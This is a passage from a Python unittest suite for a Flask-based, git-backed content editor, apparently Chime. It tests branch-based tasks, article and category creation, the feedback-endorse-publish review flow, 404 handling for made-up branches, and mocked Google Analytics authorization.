data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
# get the index page for the branch and verify that the new file is listed
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_BRANCH_COMMENT.format(generated_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": fake_page_slug, "file_title": fake_page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# get the edit page for the new file and extract the hexsha value
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name, fake_page_path))
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name, fake_page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': 'Greetings',
'en-body': u'{}\n'.format(fake_page_content),
'fr-title': '', 'fr-body': '',
'url-slug': u'{}/index'.format(fake_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(fake_page_path in response.data)
self.assertTrue(fake_page_content in response.data)
# Request feedback on the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_author_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE) in response.data)
#
#
# Log in as a different person
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_endorser_email})
# Endorse the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_endorser_email, repo_functions.ACTIVITY_ENDORSED_MESSAGE) in response.data)
# And publish the change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# should've been redirected to the front page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activities-list') in response.data)
# the activity we just published should be listed under 'recently published activities'
self.assertTrue(generated_branch_name in response.data)
self.assertTrue(response.data.find(generated_branch_name) > response.data.find(u'Recently Published Activities'))
# Look in the published directory and see if the words are there.
with open(join(self.publish_path, fake_page_slug, 'index.html')) as file:
self.assertTrue(fake_page_content in file.read())
# in TestApp
def test_delete_strange_tasks(self):
''' Delete a task that you can see on the activity list but haven't viewed or edited.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
disposable_task_description = u'unimportant task for unimportant person'
response = self.test_client.post('/start', data={'task_description': disposable_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(disposable_task_description) in response.data)
# create a branch programmatically on our pre-made clone
check_task_description = u'Creating a Star Child for Ancient Aliens'
check_branch = repo_functions.get_start_branch(self.clone1, 'master', check_task_description, fake_author_email)
self.assertTrue(check_branch.name in self.clone1.branches)
self.assertTrue(check_branch.name in self.origin.branches)
# verify that the branch doesn't exist in our new clone
with self.app.app_context():
with self.app.test_request_context():
from flask import session
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
self.assertFalse(check_branch.name in new_clone.branches)
# load the activity list and verify that the branch is visible there
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(check_branch.name in response.data)
# Delete the activity
response = self.test_client.post('/update', data={'abandon': 'Delete', 'branch': '{}'.format(check_branch.name)}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertFalse(check_branch.name in response.data)
# in TestApp
def test_review_process(self):
''' Check the review process
'''
fake_task_description = u'groom pets for pet owners'
fake_author_email = u'erica@example.com'
fake_endorser_email = u'frances@example.com'
fake_page_slug = u'hello'
# log in
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new branch
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the edited column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-edited")[0]
# there should be an HTML comment with the branch name
comments = pub_ul.findAll(text=lambda text: isinstance(text, Comment))
found = False
for comment in comments:
if generated_branch_name in comment:
found = True
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
self.assertEqual(True, found)
# create a new file
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'request feedback' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "request-feedback-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'request feedback' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "request-feedback-button"}))
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the edited column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-edited")[0]
# there should be an HTML comment with the branch name
comments = pub_ul.findAll(text=lambda text: isinstance(text, Comment))
found = False
for comment in comments:
if generated_branch_name in comment:
found = True
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
self.assertEqual(True, found)
# Request feedback on the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'request_feedback': u'Request Feedback'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_author_email, repo_functions.ACTIVITY_FEEDBACK_MESSAGE) in response.data)
#
#
# Log in as a different person
with HTTMock(self.mock_persona_verify_frances):
self.test_client.post('/sign-in', data={'assertion': fake_endorser_email})
with HTTMock(self.auth_csv_example_allowed):
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'Endorse Edits' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "endorse-edits-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'Endorse Edits' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "endorse-edits-button"}))
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the feedback needed column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-feedback")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# Endorse the change
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'endorse_edits': 'Endorse Edits'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(u'{} {}'.format(fake_endorser_email, repo_functions.ACTIVITY_ENDORSED_MESSAGE) in response.data)
# log back in as the original editor
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# get the edit page for the branch
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'publish' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "publish-button"}))
# get the overview page for the branch
response = self.test_client.get('/tree/{}/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that there's a 'publish' button
soup = BeautifulSoup(response.data)
self.assertIsNotNone(soup.find("button", {"data-test-id": "publish-button"}))
# get the activity list page
response = self.test_client.get(constants.ROUTE_ACTIVITY, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# verify that the project is listed in the ready to publish column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-endorsed")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# And publish the change!
with HTTMock(self.auth_csv_example_allowed):
response = self.test_client.post('/tree/{}/'.format(generated_branch_name), data={'comment_text': u'', 'merge': 'Publish'}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
# should've been redirected to the front page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activities-list') in response.data)
# verify that the project is listed in the recently published column
soup = BeautifulSoup(response.data)
pub_ul = soup.select("#activity-list-published")[0]
# there should be an HTML comment with the branch name
comment = pub_ul.findAll(text=lambda text: isinstance(text, Comment))[0]
self.assertTrue(generated_branch_name in comment)
pub_li = comment.find_parent('li')
# and the activity title wrapped in an a tag
self.assertIsNotNone(pub_li.find('a', text=fake_task_description))
# in TestApp
def test_get_request_does_not_create_branch(self):
''' Navigating to a made-up URL should not create a branch
'''
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.auth_csv_example_allowed):
fake_branch_name = 'this-should-not-create-a-branch'
#
# edit
#
response = self.test_client.get('/tree/{}/edit/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# history
#
response = self.test_client.get('/tree/{}/history/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# view
#
response = self.test_client.get('/tree/{}/view/'.format(fake_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch path should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_branch_name) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
# in TestApp
def test_post_request_does_not_create_branch(self):
''' Certain POSTs to a made-up URL should not create a branch
'''
fake_page_slug = u'hello'
fake_page_path = u'{}/index.{}'.format(fake_page_slug, constants.CONTENT_FILE_EXTENSION)
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.auth_csv_example_allowed):
#
# try creating an article in a non-existent branch
#
fake_branch_name = repo_functions.make_branch_name()
response = self.test_client.post('/tree/{}/edit/'.format(fake_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug}, follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse(fake_branch_name in self.origin.branches)
#
# create a branch then delete it right before a POSTing a save command
#
fake_task_description = u'Doing fake stuff for Nobody'
response = self.test_client.post('/start', data={'task_description': fake_task_description}, follow_redirects=True)
# we should be on the new task's edit page
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(fake_task_description) in response.data)
# extract the generated branch name from the returned HTML
generated_branch_search = search(r'<!-- branch: (.{{{}}}) -->'.format(repo_functions.BRANCH_NAME_LENGTH), response.data)
self.assertIsNotNone(generated_branch_search)
try:
generated_branch_name = generated_branch_search.group(1)
except AttributeError:
raise Exception('No match for generated branch name.')
# create a new article
response = self.test_client.post('/tree/{}/edit/'.format(generated_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': fake_page_slug}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('article-edit') in response.data)
# load the article list and verify that the new article is listed
response = self.test_client.get('/tree/{}/edit/'.format(generated_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_BRANCH_COMMENT.format(generated_branch_name) in response.data)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": fake_page_slug, "file_title": fake_page_slug, "file_type": constants.ARTICLE_LAYOUT}) in response.data)
# load the article edit page and grab the hexsha from the form
response = self.test_client.get('/tree/{}/edit/{}'.format(generated_branch_name, fake_page_path))
self.assertEqual(response.status_code, 200)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# delete the branch
response = self.test_client.post('/update', data={'abandon': 'Delete', 'branch': '{}'.format(generated_branch_name)}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertFalse(generated_branch_name in response.data)
# try submitting a change to the article
response = self.test_client.post('/tree/{}/save/{}'.format(generated_branch_name, fake_page_path), data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha, 'en-title': 'Greetings', 'en-body': 'Hello world.\n', 'fr-title': '', 'fr-body': '', 'url-slug': 'hello'}, follow_redirects=True)
self.assertEqual(response.status_code, 404)
self.assertTrue(view_functions.MESSAGE_ACTIVITY_DELETED in response.data)
# the task name should not be in the returned HTML
self.assertFalse(PATTERN_BRANCH_COMMENT.format(fake_task_description) in response.data)
# the branch name should not be in the origin's branches list
self.assertFalse('{}'.format(generated_branch_name) in self.origin.branches)
# in TestApp
def test_accessing_local_branch_fetches_remote(self):
''' GETting or POSTing to a URL that indicates a branch that exists remotely but not locally
fetches the remote branch and allows access
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
disposable_task_description = u'unimportant task for unimportant person'
response = self.test_client.post('/start', data={'task_description': disposable_task_description}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(disposable_task_description) in response.data)
# create a branch programmatically on our pre-made clone
check_task_description = u'the branch we are checking for for just me'
check_branch = repo_functions.get_start_branch(self.clone1, 'master', check_task_description, fake_author_email)
self.assertTrue(check_branch.name in self.clone1.branches)
self.assertTrue(check_branch.name in self.origin.branches)
# verify that the branch doesn't exist in our new clone
with self.app.app_context():
with self.app.test_request_context():
from flask import session
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
self.assertFalse(check_branch.name in new_clone.branches)
# request an edit page for the check branch through the http interface
response = self.test_client.get('/tree/{}/edit/'.format(check_branch.name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
# the task description should be in the returned HTML
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('articles-list') in response.data)
self.assertTrue(PATTERN_TASK_COMMENT.format(check_task_description) in response.data)
# the branch name should now be in the original repo's branches list
self.assertTrue(check_branch.name in new_clone.branches)
# in TestApp
def test_git_merge_strategy_implemented(self):
''' The Git merge strategy has been implmemented for a new clone.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# create a new clone via get_repo
with self.app.app_context():
with self.app.test_request_context():
from flask import session
session['email'] = fake_author_email
new_clone = view_functions.get_repo(flask_app=self.app)
# check for the config setting
self.assertEqual(new_clone.config_reader().get_value('merge "ignored"', 'driver'), True)
# check for the attributes setting
attributes_path = join(new_clone.git_dir, 'info/attributes')
self.assertTrue(exists(attributes_path))
with open(attributes_path, 'r') as file:
content = file.read().decode("utf-8")
self.assertEqual(content, u'{} merge=ignored'.format(repo_functions.TASK_METADATA_FILENAME))
# in TestApp
def test_task_metadata_should_exist(self):
''' Task metadata file should exist but doesn't
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
fake_task_description = u'unimportant task for unimportant person'
branch1 = repo_functions.get_start_branch(self.clone1, 'master', fake_task_description, fake_author_email)
branch1_name = branch1.name
branch1.checkout()
# verify that the most recent commit on the new branch is for starting the activity
self.assertTrue(repo_functions.ACTIVITY_CREATED_MESSAGE in branch1.commit.message)
# validate the existence of the task metadata file
self.assertTrue(repo_functions.verify_file_exists_in_branch(self.clone1, repo_functions.TASK_METADATA_FILENAME, branch1_name))
# now delete it
repo_functions.delete_task_metadata_for_branch(self.clone1, 'master')
self.assertFalse(repo_functions.verify_file_exists_in_branch(self.clone1, repo_functions.TASK_METADATA_FILENAME, branch1_name))
# verify that we can load a functional edit page for the branch
with HTTMock(self.auth_csv_example_allowed):
# request an edit page for the check branch through the http interface
response = self.test_client.get('/tree/{}/edit/'.format(branch1_name), follow_redirects=True)
# it's a good response
self.assertEqual(response.status_code, 200)
# the branch name should be in the returned HTML
self.assertTrue(PATTERN_BRANCH_COMMENT.format(branch1_name) in response.data)
# the 'Started by' should be 'Unknown' for now
self.assertTrue(PATTERN_AUTHOR_COMMENT.format(u'unknown') in response.data)
# in TestApp
def test_google_callback_is_successful(self):
''' Ensure we get a successful page load on callback from Google authentication
'''
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
self.test_client.post('/authorize')
with HTTMock(self.mock_successful_google_callback):
response = self.test_client.get('/callback?state=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP&code=code')
with self.app.app_context():
ga_config = google_api_functions.read_ga_config(self.app.config['RUNNING_STATE_DIR'])
self.assertEqual(ga_config['access_token'], 'meowser_token')
self.assertEqual(ga_config['refresh_token'], 'refresh_meows')
self.assertTrue('/setup' in response.location)
# in TestApp
def test_analytics_setup_is_successful(self):
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
self.test_client.post('/authorize')
# mock-post the form in authorize.html to authorization-complete.html with some dummy values and check the results
response = self.test_client.post('/authorization-complete', data={'email': 'erica@example.com', 'name': 'Jane Doe', 'google_email': 'erica@example.com', 'return_link': 'http://example.com', 'property': '12345678', '12345678-domain': 'http://propertyone.example.com', '12345678-name': 'Property One'})
self.assertEqual(u'200 OK', response.status)
with self.app.app_context():
ga_config = google_api_functions.read_ga_config(self.app.config['RUNNING_STATE_DIR'])
# views.authorization_complete() strips the 'http://' from the domain
self.assertEqual(ga_config['project_domain'], 'propertyone.example.com')
self.assertEqual(ga_config['profile_id'], '12345678')
# in TestApp
def test_handle_bad_analytics_response(self):
''' Verify that an unauthorized analytics response is handled correctly
'''
with HTTMock(self.mock_google_invalid_credentials_response):
with self.app.app_context():
analytics_dict = google_api_functions.fetch_google_analytics_for_page(self.app.config, u'index.html', 'meowser_token')
self.assertEqual(analytics_dict, {})
# in TestApp
def test_google_callback_fails(self):
''' Ensure that we get an appropriate error flashed when we fail to auth with google
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
with HTTMock(self.mock_google_authorization):
response = self.test_client.post('/authorize')
with HTTMock(self.mock_failed_google_callback):
response = self.test_client.get('/callback?state=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP&code=code', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Google rejected authorization request' in response.data)
# in TestApp
def test_invalid_access_token(self):
''' Ensure that we get an appropriate error flashed when we have an invalid access token
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.mock_google_invalid_credentials_response):
response = self.test_client.get('/setup', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Invalid Credentials' in response.data)
# in TestApp
def test_no_properties_found(self):
''' Ensure that we get an appropriate error flashed when no analytics properties are
associated with the authorized Google account
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.post('/sign-in', data={'assertion': 'erica@example.com'})
self.assertEqual(response.status_code, 200)
with HTTMock(self.mock_google_no_properties_response):
response = self.test_client.get('/setup', follow_redirects=True)
self.assertEqual(response.status_code, 200)
# find the flashed error message in the returned HTML
self.assertTrue('Your Google Account is not associated with any Google Analytics properties' in response.data)
# in TestApp
def test_redirect(self):
''' Check redirect to BROWSERID_URL.
'''
with HTTMock(self.mock_persona_verify_erica):
response = self.test_client.get('/not-allowed', headers={'Host': 'wrong.local'})
expected_url = urljoin(self.app.config['BROWSERID_URL'], '/not-allowed')
self.assertEqual(response.status_code, 302)
self.assertEqual(response.headers['Location'], expected_url)
# in TestApp
def test_create_category(self):
''' Creating a new category creates a directory with an appropriate index file inside.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'force a clam shell open for starfish'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new category
page_slug = u'hello'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, page_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# in TestApp
def test_period_in_category_name(self):
''' Putting a period in a category or subcategory name doesn't crop it.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Be Shot Hundreds Of Feet Into The Air for A Geyser Of Highly Pressurized Water')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Create a category that has a period in its name
category_name = u'Mt. Splashmore'
category_slug = slugify(category_name)
erica.add_category(category_name=category_name)
# the category is correctly represented on the page
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_name in tag.text)))
self.assertIsNotNone(erica.soup.find(lambda tag: bool(tag.name == 'a' and category_slug in tag['href'])))
# the category is correctly represented on disk
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
cat_location = join(repo.working_dir, u'{}/{}'.format(other_slug, category_slug))
self.assertTrue(exists(cat_location))
self.assertTrue(view_functions.is_category_dir(cat_location))
# in TestApp
def test_empty_category_or_article_name(self):
''' Submitting an empty category or article name reloads with a warning.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
pattern_template_comment_stripped = sub(ur'<!--|-->', u'', PATTERN_TEMPLATE_COMMENT)
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Deep-Fry a Buffalo in Forty Seconds for Moe')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
other_slug = u'other'
erica.follow_link(href='/tree/{}/edit/{}/'.format(branch_name, other_slug))
# Try to create a category with no name
category_name = u''
erica.add_category(category_name=category_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(u'Please enter a name to create a topic!', erica.soup.find('li', class_='flash').text)
# Try to create a category with a name that slufigies to an empty string
category_name = u'(╯□)╯︵ ┻━┻'
self.assertEqual(u'', slugify(category_name))
erica.add_category(category_name=category_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(u'{} is not an acceptable topic name!'.format(category_name), erica.soup.find('li', class_='flash').text)
# Create a category and sub-category
category_name = u'Mammals'
subcategory_name = u'Bison'
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
# Try to create an article with no name
article_name = u''
erica.add_article(article_name=article_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(u'Please enter a name to create an article!', erica.soup.find('li', class_='flash').text)
# Try to create a article with a name that slufigies to an empty string
article_name = u'(╯□)╯︵ ┻━┻'
self.assertEqual(u'', slugify(article_name))
erica.add_article(article_name=article_name)
# the articles-list template reloaded
comments = erica.soup.findAll(text=lambda text: isinstance(text, Comment))
self.assertTrue(pattern_template_comment_stripped.format(u'articles-list') in comments)
# verify that there's a flash message warning about submitting an empty description
self.assertEqual(u'{} is not an acceptable article name!'.format(article_name), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_create_duplicate_category(self):
''' If we ask to create a category that exists, let's not and say we did.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
working_branch = repo_functions.get_start_branch(self.clone1, 'master', u'force a clam shell open for starfish', fake_author_email)
working_branch.checkout()
# create a new category
request_data = {'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': u'hello'}
response = self.test_client.post('/tree/{}/edit/'.format(working_branch.name),
data=request_data,
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# now do it again
response = self.test_client.post('/tree/{}/edit/'.format(working_branch.name),
data=request_data,
follow_redirects=True)
self.assertEqual(response.status_code, 200)
response_data = sub('"', '"', response.data.decode('utf-8'))
self.assertTrue(u'Topic "hello" already exists' in response_data)
# pull the changes
self.clone1.git.pull('origin', working_branch.name)
# everything looks good
dir_location = join(self.clone1.working_dir, u'hello')
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# in TestApp
def test_delete_categories_and_articles(self):
''' Non-empty categories and articles can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
